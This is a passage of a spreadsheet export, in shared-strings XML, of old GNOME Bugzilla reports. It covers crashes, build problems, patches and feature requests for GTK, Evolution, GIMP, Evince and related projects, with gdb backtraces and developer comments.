(no debugging symbols found)...(no debugging symbols found)...
0x404a2489 in __wait4 () from /lib/libc.so.6
#0  0x404a2489 in __wait4 () from /lib/libc.so.6
#1  0x4050048c in __DTOR_END__ () from /lib/libc.so.6
#2  0x40087599 in gnome_segv_handle () from /usr/local/lib/libgnomeui.so.32
#3  0x40430408 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x401c6e34 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#5  0x401f3705 in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#6  0x401f2bbe in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#7  0x401f0e0b in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#8  0x402251fc in gtk_widget_activate () from /usr/lib/libgtk-1.2.so.0
#9  0x401ce1bb in gtk_menu_shell_activate_item () from /usr/lib/libgtk-1.2.so.0
#10 0x401cd573 in gtk_menu_shell_button_release ()
   from /usr/lib/libgtk-1.2.so.0
#11 0x401c6a44 in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#12 0x401f2bf7 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#13 0x401f0e0b in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#14 0x402250c8 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#15 0x401c69b2 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#16 0x401c5c56 in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#17 0x4026dff2 in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#18 0x403fcbb7 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#19 0x403fd183 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#20 0x403fd311 in g_main_run () from /usr/lib/libglib-1.2.so.0
#21 0x401c559b in gtk_main () from /usr/lib/libgtk-1.2.so.0
#22 0x805651f in main ()
#23 0x4042a1eb in __libc_start_main (main=0x8056214  argc=2 
    argv=0xbffff8a4 init=0x804c45c  fini=0x8057bc0  
    rtld_fini=0x4000a610  stack_end=0xbffff89c)
    at ../sysdeps/generic/libc-start.c:90
#0  0x404a2489 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x4050048c in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40087599 in gnome_segv_handle () from /usr/local/lib/libgnomeui.so.32
No symbol table info available.
#3  0x40430408 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x401c6e34 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#5  0x401f3705 in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#6  0x401f2bbe in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#7  0x401f0e0b in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-28 11:58 -------
This bug was previously known as bug 7573 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=7573
Originally filed under the gnome-utils product and general component.
Unknown version 1.1.x in product gnome-utils. Setting version to the default unspecified.
The original reporter (gemi@bluewin.ch) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-utils-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>gemi</t>
  </si>
  <si>
    <t>EVOLUTION-245907</t>
  </si>
  <si>
    <t>Require better error message on folder rename</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
installed Evolution on a machine running SLEC RC1.
Steps to reproduce the problem:
1.Create a new folder say 'test'
2.Right click on 'test' folder and select Rename.
3.Rename Folder window pops up.
4.Input any existing folder name say 'Trash'
5.Click Ok.Error message Cannot rename folder.Generic Error is displayed.
From user perspective it would be better if the error message is more
specificn as is displayed during Folder creation (Providing the name of the
existing Folder).
Actual Results:
Expected Results:
How often does this happen? 
always
Additional Information:</t>
  </si>
  <si>
    <t>cynthia.gu</t>
  </si>
  <si>
    <t>GNOME-LOGS-709297</t>
  </si>
  <si>
    <t>GNOME-LOGS</t>
  </si>
  <si>
    <t>show more log items by default</t>
  </si>
  <si>
    <t>It seems that we currently show the most recent 10 log items. This isn't enough especially since we don't have event compression. Perhaps a good default would be to load the log since the last boot and have an option to load more if required.</t>
  </si>
  <si>
    <t>gnome-logs-maint</t>
  </si>
  <si>
    <t>BONOBO-ACTIVATION_[WAS:_OAF]-48197</t>
  </si>
  <si>
    <t>BONOBO-ACTIVATION_[WAS:_OAF]</t>
  </si>
  <si>
    <t>liboaf should issue a meaningful error message when oafd is missing</t>
  </si>
  <si>
    <t xml:space="preserve">I have installed Ximian GNOME using apt-get.  During the post-installation
configuration of gconf this error message appeared:
StÃ¤ller in gconf (1.0.0-ximian.4) ...
** CRITICAL **: file oaf-activate.c: line 279 (oaf_activate_from_id):
   assertion
   `ac' failed.
   Initializing XML backend module
   Directory/file permissions for XML source at root
   /etc/gconf/gconf.xml.defaults
   are: 700/600
   Installed schema `/schemas/desktop/standard/recent-document-entry'
   for locale `C'
   Installed schema `/schemas/desktop/standard/save-location-entry'
   for locale `C'
   Unloading XML backend module.
   gconfd-1: no process killed
StÃ¤ller in is Swedish for configuring btw.
Running gconftool with no parameters gives a shorter error-message:
johan@foo:~$ gconftool
** CRITICAL **: file oaf-activate.c: line 279 (oaf_activate_from_id): assertion
`ac' failed.
This bug is a duplicate of http://bugzilla.gnome.org/show_bug.cgi?id=53812
Havoc Pennington said the bug should be reported here instead.
------- Additional Comments From d92-jwa@nada.kth.se 2001-04-30 12:49:15 ----
I am unable to use Nautilus on Debian 2.2r3 (Potato) with Ximian GNOME until
this is resolved.
------- Additional Comments From mjs@noisehavoc.org 2001-06-10 16:22:25 ----
This sounds like a packaging issue. I don't know why oaf would even be involved
while installing with apt-get. Please report this bug to your package vendor.
------- Additional Comments From eahagglun@yahoo.com 2001-07-04 10:11:29 ----
On June 10th mjs wrote:
------- Additional Comments From mjs@noisehavoc.org  2001-06-10 16:22 -------
This sounds like a packaging issue. I don't know why oaf would even be involved
while installing with apt-get. Please report this bug to your package vendor.
This is really a lame answer. When a bug is reported the developer handling it
should report as needed to 
outside units for resolution then update the status as needed in bug report so
that users may cross-reference.
I have been trying to find out if Debian is even aware of this and have been
unable to verify it. 
I am currently unable to even open Nautilus in Debian using the latest available
debs on the red-carpet site and it is now July 4th. This bug was reported in
April! Someone neeeds to take ownership of this or at least update this record.
------- Additional Comments From mjs@noisehavoc.org 2001-07-04 11:48:27 ----
Hi
I'm sorry but you need to report this bug to Ximian. I can't take
responsibility for package installation problems. I am not going to report
a bug to Ximian myself because (a) I am not the one experiencing the packaging
problem and (b) I don't even have a Debian system to try this on (and if I did
I wouldn't even want to install Ximian GNOME).
------- Additional Comments From d92-jwa@nada.kth.se 2001-07-05 00:14:12 ----
The packaging problem has been reported (and apparently resolved) here:
http://bugzilla.ximian.com/show_bug.cgi?id=2462.
The assertion failure is obviously an error with whatever program that owns
oaf-activate.c.  If it wasn't an error in the code it wouldn't trigger an
assertion.  As it is an error I think it should be fixed but that's not really
for me to decide.
Anyway as the original reporter of this bug I personally don't care about it
anymore but others may.  See the discussion at Ximian's bugzilla for a workaround.
------- Additional Comments From mjs@noisehavoc.org 2001-07-05 00:18:27 ----
If the analysis in the Ximian bug report is correct the problem is that getting
gconf using apt-get gets liboaf but not the package which contains oafd (on
Debian they are separate). The assertion failure is because liboaf tries to
launch oafd and does not find it a situation that comes up only when you have a
broken install. Nontheless I'll improve the error reporting in this case.
Adjusting summary and reopening...
------- Additional Comments From mjs@noisehavoc.org 2001-08-08 01:46:31 ----
OK so with Havoc's exception reporting improvements you now get this message
which I believe fixes the problem of a meaningful error message:
Eel-WARNING **: nautilus(5414): GConf error:
  Object Activation Framework error:
 OAF problem description: 'Failed to execute oafd: 2 (No such file or
directory)'
------- Additional Comments From d92-jwa@nada.kth.se 2001-08-08 01:56:32 ----
As the original reporter I thought I should chime in and tell you I'm quite
happy with this solution.  Thanks a bunch!
------- Additional Comments From mjs@noisehavoc.org 2001-08-08 01:59:34 ----
Don't thank me thank Havoc he did most of the work of improving exception
reporting (though I made some changes in this area too).
------- Additional Comments From d92-jwa@nada.kth.se 2001-08-08 02:13:49 ----
Thanks Havoc -)
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:18 -------
</t>
  </si>
  <si>
    <t>mjs</t>
  </si>
  <si>
    <t>d92-jwa</t>
  </si>
  <si>
    <t>GSTREAMER-320113</t>
  </si>
  <si>
    <t>[API] duration message changes</t>
  </si>
  <si>
    <t>(1)
Rename GST_MESSAGE_DURATION =&gt; GST_MESSAGE_DURATION_CHANGED
(2)
GstMessage * gst_message_new_duration (GstObject *src 
                                       GstFormat format 
                                       gint64 duration)
  becomes
GstMessage * gst_message_new_duration_changed (GstObject *src)
(3)
void  gst_message_parse_duration (GstMessage *message GstFormat *format gint64
*duration)
isn't required any longer.
 __tim duration queries can be quite expensive
 __tim I don't want to app to poll for it but get a notify when it
changed then let the app choose how many times it performs the expensive work
 so if it's expensive the element posts a DURATION message with duration
= -1 ?
 __tim actually the value in the message is not used
 __tim it's in the API but it's not usable in the end
 __tim the purpose of the message is to notify that the duration changed
and the exact new value can be retrieved with a query
Cheers
 -Tim</t>
  </si>
  <si>
    <t>METACITY-160470</t>
  </si>
  <si>
    <t>Hiding a panel shouldn't change the window focus to the panel</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 3 (Heidelberg)
Package: metacity
Severity: enhancement
Version: GNOME2.8.0 2.8.x
Gnome-Distributor: Red Hat Inc
Synopsis: Hiding a panel shouldn't change the window focus to the panel
Bugzilla-Product: metacity
Bugzilla-Component: general
Bugzilla-Version: 2.8.x
Description:
Please describe your feature request:
I'd be cool if I could do things with the keyboard in a window and then
when I had to collapse a panel I could do it with the mouse and go back
to the keyboard without having to refocus on the window I was working
in.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2004-12-04 19:59 -------
Unknown platform unknown. Setting to default platform Other.
Unknown milestone unknown in product metacity.
   Setting to default milestone for this product '---'
Setting to default status UNCONFIRMED.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>egwynn</t>
  </si>
  <si>
    <t>GTK+-152509</t>
  </si>
  <si>
    <t>gtkmain.c:370: warning: control reaches end of non-void function</t>
  </si>
  <si>
    <t>Missing return statement it seems.</t>
  </si>
  <si>
    <t>CHEESE-529789</t>
  </si>
  <si>
    <t>Take Picture button is enabled outside gtk thread lock</t>
  </si>
  <si>
    <t>Please describe the problem:
Inside the camera setup thread some UI updates are done using gdk_threads_enter/leave().  However the call to enable the Take Picture button currently occurs *after* gdk_threads_leave() so it is occurring outside the gtk thread lock.
It's a very simple fix.  I'll attach a patch against SVN.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>gary.lasker</t>
  </si>
  <si>
    <t>EVINCE-372355</t>
  </si>
  <si>
    <t>crash when opening pdf (invalid xref entry)</t>
  </si>
  <si>
    <t>Version: 0.6.1
What were you doing when the application crashed?
I googled for a pdf in Epiphany found a link clicked it clicked Open in the appearing window and Evince opened. I pressed Toggle Horizontal Maximization since the window was a bit too large. Then Bug Buddy came along. 
Distribution: Gentoo Base System version 1.12.6
Gnome Release: 2.16.1 2006-10-16 (Gentoo)
BugBuddy Version: 2.16.0
Memory status: size: 57442304 vsize: 0 resident: 57442304 share: 0 rss: 25223168 rss_rlim: 0
CPU usage: start_time: 1162973749 rtime: 0 utime: 326 stime: 0 cutime:320 cstime: 0 timeout: 6 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/evince'
(no debugging symbols found)
Using host libthread_db library /lib/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1228249392 (LWP 25766)]
[New Thread -1229501552 (LWP 25874)]
0xb7fd7410 in ?? ()
#0  0xb7fd7410 in ?? ()
#1  0xbffcc528 in ?? ()
#2  0x000006ea in ?? ()
#3  0x00000008 in ?? ()
#4  0xb7421bd6 in poll () from /lib/libc.so.6
#5  0xb7539945 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#6  0x00000008 in ?? ()
#7  0xbffcc564 in ?? ()
#8  0x00000001 in ?? ()
#9  0x00000001 in ?? ()
#10 0x000006ea in ?? ()
#11 0x082458f0 in ?? ()
#12 0xb749bbb5 in __pthread_mutex_unlock_usercnt () from /lib/libpthread.so.0
Thread 2 (Thread -1229501552 (LWP 25874)):
#0  0xb7fd7410 in ?? ()
No symbol table info available.
Thread 1 (Thread -1228249392 (LWP 25766)):
#0  0xb7fd7410 in ?? ()
No symbol table info available.
#1  0xbffcc528 in ?? ()
No symbol table info available.
#2  0x000006ea in ?? ()
No symbol table info available.
#3  0x00000008 in ?? ()
No symbol table info available.
#4  0xb7421bd6 in poll () from /lib/libc.so.6
No symbol table info available.
#5  0xb7539945 in g_main_context_check () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#6  0x00000008 in ?? ()
No symbol table info available.
#7  0xbffcc564 in ?? ()
No symbol table info available.
#8  0x00000001 in ?? ()
No symbol table info available.
#9  0x00000001 in ?? ()
No symbol table info available.
#10 0x000006ea in ?? ()
No symbol table info available.
#11 0x082458f0 in ?? ()
No symbol table info available.
#12 0xb749bbb5 in __pthread_mutex_unlock_usercnt () from /lib/libpthread.so.0
No symbol table info available.
#0  0xb7fd7410 in ?? ()</t>
  </si>
  <si>
    <t>jespera</t>
  </si>
  <si>
    <t>BUGZILLA.GNOME.ORG-52049</t>
  </si>
  <si>
    <t>Making changes while not logged in doesn't work.</t>
  </si>
  <si>
    <t>If you make changes to an existing bug when not logged
in then you get the screen please enter your login
to continue but when you do that it always claims
that you entered a invalid login/password and doesn't
commit the changes.
(You are now logged in however if you go back to the
query page.)</t>
  </si>
  <si>
    <t>GTK+-9656</t>
  </si>
  <si>
    <t>makeenums.pl have problem while building in separate directory</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gtk+
Version: any
Machine: any
Details:
I am compiling gtk+ in separate directory by:
mkdir -p /var/src/gtk+
cd /var/src/gtk+
 /usr/src/gtk+/autogen.sh --prefix=/usr/gtk --with-xinput=xfree
Looking into details in make log I have found following bug report:
in perl makeenums.pl
Can't open gtkfeatures.h: no file or directory
The reason is: gtkfeatures.h is generated in builddir but searched
in srcdir.
-- 
Stanislav Brabec
------- Additional Comments From utx@k332.feld.cvut.cz 2000-04-25 05:22:37 ----
Subject: makeenums.pl have problem while building in separate directory
From: Stanislav Brabec 
To: bugs@gnome.org
Message-Id: 
Date: Tue 25 Apr 2000 11:22:37 +0200
Package: gtk+
Version: any
Machine: any
Details:
I am compiling gtk+ in separate directory by:
mkdir -p /var/src/gtk+
cd /var/src/gtk+
 /usr/src/gtk+/autogen.sh --prefix=/usr/gtk --with-xinput=xfree
Looking into details in make log I have found following bug report:
in perl makeenums.pl
Can't open gtkfeatures.h: no file or directory
The reason is: gtkfeatures.h is generated in builddir but searched
in srcdir.
-- 
Stanislav Brabec
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 14:47 -------
This bug was previously known as bug 9656 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=9656
Originally filed under the gtk+ product and general component.
The original reporter (utx@k332.feld.cvut.cz) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gtk-bugs@gtk.org.
</t>
  </si>
  <si>
    <t>GNOPERNICUS-303261</t>
  </si>
  <si>
    <t>magnifier</t>
  </si>
  <si>
    <t>GNOPERNICUS</t>
  </si>
  <si>
    <t>view jumps on full screen mag when focus switch to desktop</t>
  </si>
  <si>
    <t>Distribution/Version: JDS Rel3 B34
Using gnopernicus 0.10.7
- Launch gnopernicus with full screen mag and
  focus tracking=auto.
- Open a terminal.
Notice that when the user clicks on the desktop
(changing focus to the desktop from the terminal)
the view jumps over a bit. This is unnecessary.
When focus switches to the desktop the view should
not change at all or should change in relation to 
where the mouse is.</t>
  </si>
  <si>
    <t>john.crawley</t>
  </si>
  <si>
    <t>LIBXML++-307481</t>
  </si>
  <si>
    <t>LIBXML++</t>
  </si>
  <si>
    <t>minor C++ syntax glitches</t>
  </si>
  <si>
    <t>Version details: 2.10.0
Distribution/Version: Solaris 8 Sparc RedHat Enterprise Linux 3.0 AMD64
There are a few minor C++ syntax glitches which are fixed by this patch.
I used gcc/3.4.3 with all warnings/-pedantic turned on.
diff -ruN libxml++-2.10.0-old/libxml++/io/parserinputbuffer.h libxml++-
2.10.0/libxml++/io/parserinputbuffer.h
--- libxml++-2.10.0-old/libxml++/io/parserinputbuffer.h	2004-05-28 
23:33:03.000000000 +0200
+++ libxml++-2.10.0/libxml++/io/parserinputbuffer.h	2005-06-10 
15:22:39.200834000 +0200
@@ -167 +167 @@
 extern C
 {
   struct _xmlParserInputBuffer
-}
+}
 namespace xmlpp
 {
@@ -706 +706 @@
       friend struct ParserInputBufferCallback
   }
-}
+}
 #endif
diff -ruN libxml++-2.10.0-old/libxml++/io/istreamparserinputbuffer.h libxml++-
2.10.0/libxml++/io/istreamparserinputbuffer.h
--- libxml++-2.10.0-old/libxml++/io/istreamparserinputbuffer.h	2005-06-10 
15:23:35.578587000 +0200
+++ libxml++-2.10.0/libxml++/io/istreamparserinputbuffer.h	2005-06-10 
15:23:53.374337000 +0200
@@ -316 +316 @@
       std::istream
   }
-}
+}
 #endif
diff -ruN libxml++-2.10.0-old/libxml++/io/istreamparserinputbuffer.cc libxml++-
2.10.0/libxml++/io/istreamparserinputbuffer.cc
--- libxml++-2.10.0-old/libxml++/io/istreamparserinputbuffer.cc	2005-06-10 
15:24:11.549020000 +0200
+++ libxml++-2.10.0/libxml++/io/istreamparserinputbuffer.cc	2005-06-10 
15:24:42.755502000 +0200
@@ -414 +414 @@
   {
     return input_
   }
-}
+}
diff -ruN libxml++-2.10.0-old/libxml++/io/parserinputbuffer.cc libxml++-
2.10.0/libxml++/io/parserinputbuffer.cc
--- libxml++-2.10.0-old/libxml++/io/parserinputbuffer.cc	2005-06-10 
15:30:24.850209000 +0200
+++ libxml++-2.10.0/libxml++/io/parserinputbuffer.cc	2005-06-10 
15:30:42.272248000 +0200
@@ -814 +814 @@
     return impl_
   }
-}
+}</t>
  </si>
  <si>
    <t>cdevienne</t>
  </si>
  <si>
    <t>marek.rouchal</t>
  </si>
  <si>
    <t>EVOLUTION-255007</t>
  </si>
  <si>
    <t>evolution-alarm-notify has crashed</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Critical
Version: 1.4.5
Synopsis: evolution-alarm-notify has crashed
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
BugBuddy-GnomeVersion: 2.0 (2.2.0.1)
Description:
Description of Problem:
Steps to reproduce the problem:
1. 
2. 
3. 
Actual Results:
Expected Results:
How often does this happen?
Additional Information:
Unknown reporter: tommi.lineholm@impreo.com changed to bugbuddy-import@ximian.com.
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>tommi.lineholm</t>
  </si>
  <si>
    <t>EVOLUTION-474557</t>
  </si>
  <si>
    <t>Runtime warnings in e-table-group-container.c:etgc_reflow</t>
  </si>
  <si>
    <t>I found a runtime warnings when changing view in contacts to By company. It shows these warnings (3 times):
(evolution:20183): GLib-GObject-WARNING **: invalid cast from `ETableGroupContainer' to `GtkWidget'
(evolution:20183): Gtk-CRITICAL **: gtk_widget_get_pango_context: assertion `GTK_IS_WIDGET (widget)' failed
(evolution:20183): Pango-CRITICAL **: pango_context_get_metrics: assertion `PANGO_IS_CONTEXT (context)' failed
(evolution:20183): Pango-CRITICAL **: pango_font_metrics_get_ascent: assertion `metrics != NULL' failed
(evolution:20183): Pango-CRITICAL **: pango_font_metrics_get_descent: assertion `metrics != NULL' failed</t>
  </si>
  <si>
    <t>EVOLUTION-261737</t>
  </si>
  <si>
    <t>If is not a good label for the advanced contact search</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Steps to reproduce the problem:
1. 
2. 
3. 
Actual Results:
Expected Results:
How often does this happen? 
Additional Information:</t>
  </si>
  <si>
    <t>GIMP-470304</t>
  </si>
  <si>
    <t>Crash on startup after migrating gimp 2.2 prefs?</t>
  </si>
  <si>
    <t>From Debian bug report http://bugs.debian.org/439509.
Gimp doesn't launch but crashes with a segmentation fault instead. If I remove ~/.gimp* gimp starts again but not just if I remove ~/.gimp-2.3 or ~/.gimp-2.4.
Error message:
(script-fu:15308): LibGimpBase-WARNING **: script-fu: gimp_wire_read():
error
Here is the output of GDB:
Starting program: /usr/bin/gimp 
[Thread debugging using libthread_db enabled]
[New Thread -1219848528 (LWP 15314)]
[New Thread -1221854320 (LWP 15317)]
[New Thread -1230247024 (LWP 15318)]
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1219848528 (LWP 15314)]
gimp_tool_options_editor_get_title (docked=0x8e2cb98)
    at
/home/yusei/gimptmp/gimp-2.4.0~rc1/./app/widgets/gimptooloptionseditor.c:249
249       return g_strdup (tool_info-&gt;blurb)
(tool_info is null)
complete trace:
#0  gimp_tool_options_editor_get_title (docked=0x8e2cb98)
    at
#/home/yusei/gimptmp/gimp-2.4.0~rc1/./app/widgets/gimptooloptionseditor.c:249
#1  0x0814d9fb in gimp_dockable_expose_event (widget=0x8ac0d08
#event=0x9064720)
    at /home/yusei/gimptmp/gimp-2.4.0~rc1/./app/widgets/gimpdockable.c:459
#2  0xb7c48c10 in ?? () from /usr/lib/libgtk-x11-2.0.so.0
#3  0x08ac0d08 in ?? ()
#4  0x09064720 in ?? ()
#5  0x08446f48 in ?? ()
#6  0xb79ca678 in ?? () from /usr/lib/libgobject-2.0.so.0
#7  0xbfdac9ac in ?? ()
#8  0x0844aa08 in ?? ()
#9  0xbfdac798 in ?? ()
#10 0xb7998f39 in ?? () from /usr/lib/libgobject-2.0.so.0
#11 0x0844aa08 in ?? ()
#12 0xbfdac8d0 in ?? ()
#13 0x00000002 in ?? ()
#14 0xbfdac9ac in ?? ()
#15 0xbfdac8bc in ?? ()
#16 0x0814d7f0 in ?? () at
#/home/yusei/gimptmp/gimp-2.4.0~rc1/./app/widgets/gimpdockable.c:968
#17 0xb799a3db in g_closure_unref () from /usr/lib/libgobject-2.0.so.0
Backtrace stopped: previous frame inner to this frame (corrupt stack?)</t>
  </si>
  <si>
    <t>ajp+gnome</t>
  </si>
  <si>
    <t>EEL-82514</t>
  </si>
  <si>
    <t>EEL</t>
  </si>
  <si>
    <t>[PATCH] some preferences dialog look enhancements</t>
  </si>
  <si>
    <t>This patch changes the shadow type of the prefswin category window to
GTK_SHADOW_IN and changes the border width of the overall thing to 5 for
consistency.</t>
  </si>
  <si>
    <t>CONGLOMERATE-125454</t>
  </si>
  <si>
    <t>Code</t>
  </si>
  <si>
    <t>CONGLOMERATE</t>
  </si>
  <si>
    <t>Template paths should be stored as a list rather than as single string</t>
  </si>
  <si>
    <t>Currently stored as a colon-separated list.</t>
  </si>
  <si>
    <t>conglomerate-auto</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-441647</t>
  </si>
  <si>
    <t>network-admin</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS</t>
  </si>
  <si>
    <t>connection_combo_get_value() implicitly converted to pointer</t>
  </si>
  <si>
    <t>Dann Frazier reported in Debian bug http://bugs.debian.org/423868 that the
automated buildd log filter detected a problem that will cause nautilus to
segfault on architectures where the size of a pointer is greater than the size
of an integer such as ia64 and amd64.
He provided a patch which I'll attach.</t>
  </si>
  <si>
    <t>GIMP-148601</t>
  </si>
  <si>
    <t>Using Paste from clipboard causes the layer preview to get corrupted</t>
  </si>
  <si>
    <t>Open an image.
Select Edit-&gt;Copy to Clipboard.
Select Edit-&gt;Paste from Clipboard.
The layer preview of the pasted layer is corrupted.</t>
  </si>
  <si>
    <t>6istrvw02</t>
  </si>
  <si>
    <t>GEDIT-69335</t>
  </si>
  <si>
    <t>gedit 2 doesn't install schema files properly.</t>
  </si>
  <si>
    <t>For whatever reasons the rules that you're using to install the
gedit.schemas files aren't correct.  At least they don't work the way
that everything else seems to.  For example when I do 'export
GCONF_DISABLE_MAKEFILE_SCHEMA_INSTALL=1' followed by make install it still
seems to attempt (and fail locally because I'm not root) to install the
schemas.  I think you can steal this code from gnome-core as that seems to
work properly.</t>
  </si>
  <si>
    <t>gleblanc</t>
  </si>
  <si>
    <t>EVOLUTION-274420</t>
  </si>
  <si>
    <t>cannot see any meetings on my GroupWise calendar</t>
  </si>
  <si>
    <t>evolution-2.2.1.0.200504010400-0.snap.novell.0.1
wal-3 server
my calendar appears as completely blank. no idea why. attaching debug. what
info do you need?</t>
  </si>
  <si>
    <t>christine</t>
  </si>
  <si>
    <t>GNOME-CORE-36296</t>
  </si>
  <si>
    <t>Crash after startup</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnome-core
Severity: normal
Version:  1.2.4
Synopsis: Crash after startup
Class:    sw-bug
System: Linux 2.2.18 i686 unknown
C compiler: 2.95.2
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.5
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25
gnome-core: gnome-core 1.2.4
Description:
This happens after i started nautilus for the first time. After restart
the session without nautilus GConf complains Can`t find configuration
in ..... dont remember and a second restart crashes gnome.
Debugging information:
0x4056e3f9 in __wait4 () from /lib/libc.so.6
#0  0x4056e3f9 in __wait4 () from /lib/libc.so.6
#1  0x405cb638 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40094dba in gnome_segv_handle () from /opt/gnome/lib/libgnomeui.so.32
#3  0x4050c998 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x40425f03 in g_free () from /usr/lib/libglib-1.2.so.0
#5  0x8054344 in free_list ()
#6  0x4042e7bc in g_slist_foreach () from /usr/lib/libglib-1.2.so.0
#7  0x8054393 in splash_cleanup ()
#8  0x401e41a3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#9  0x40215068 in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#10 0x4021443f in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#11 0x402123a7 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#12 0x401f5fcc in gtk_object_shutdown () from /usr/lib/libgtk-1.2.so.0
#13 0x4024ed28 in gtk_widget_shutdown () from /usr/lib/libgtk-1.2.so.0
#14 0x4025195b in gtk_window_shutdown () from /usr/lib/libgtk-1.2.so.0
#15 0x401f5f6a in gtk_object_destroy () from /usr/lib/libgtk-1.2.so.0
#16 0x402472c9 in gtk_widget_destroy () from /usr/lib/libgtk-1.2.so.0
#17 0x80543ee in timeout_cb ()
#18 0x40425b83 in g_timeout_dispatch () from /usr/lib/libglib-1.2.so.0
#19 0x40424bb6 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#20 0x40424dcc in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#21 0x404252aa in g_main_iteration () from /usr/lib/libglib-1.2.so.0
#22 0x401e28a6 in gtk_main_iteration () from /usr/lib/libgtk-1.2.so.0
#23 0x804fe96 in accept_connection ()
#24 0x402956f4 in gdk_io_invoke () from /usr/lib/libgdk-1.2.so.0
#25 0x40423320 in g_io_unix_dispatch () from /usr/lib/libglib-1.2.so.0
#26 0x40424bb6 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#27 0x404251e3 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#28 0x404253ac in g_main_run () from /usr/lib/libglib-1.2.so.0
#29 0x401e261c in gtk_main () from /usr/lib/libgtk-1.2.so.0
#30 0x805097d in main ()
#31 0x40506a4e in __libc_start_main () at ../sysdeps/generic/libc-start.c:93
#0  0x4056e3f9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x405cb638 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40094dba in gnome_segv_handle () from /opt/gnome/lib/libgnomeui.so.32
No symbol table info available.
#3  0x4050c998 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x40425f03 in g_free () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#5  0x8054344 in free_list ()
No symbol table info available.
#6  0x4042e7bc in g_slist_foreach () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#7  0x8054393 in splash_cleanup ()
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 15:10 -------
This bug was previously known as bug 36296 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=36296
Originally filed under the gnome-core product and general component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (jens-reimer@t-online.de) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-core-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>gnome-core-maint</t>
  </si>
  <si>
    <t>jens-reimer</t>
  </si>
  <si>
    <t>GNOME-MEDIA-329409</t>
  </si>
  <si>
    <t>gnome-media Cygwin build fixes</t>
  </si>
  <si>
    <t>I'm attaching a patch to fix several build issues with gnome-media-2.13.91 on Cygwin.
FYI yes GStreamer-0.10 actually works on Cygwin (see bug 317048 for details):
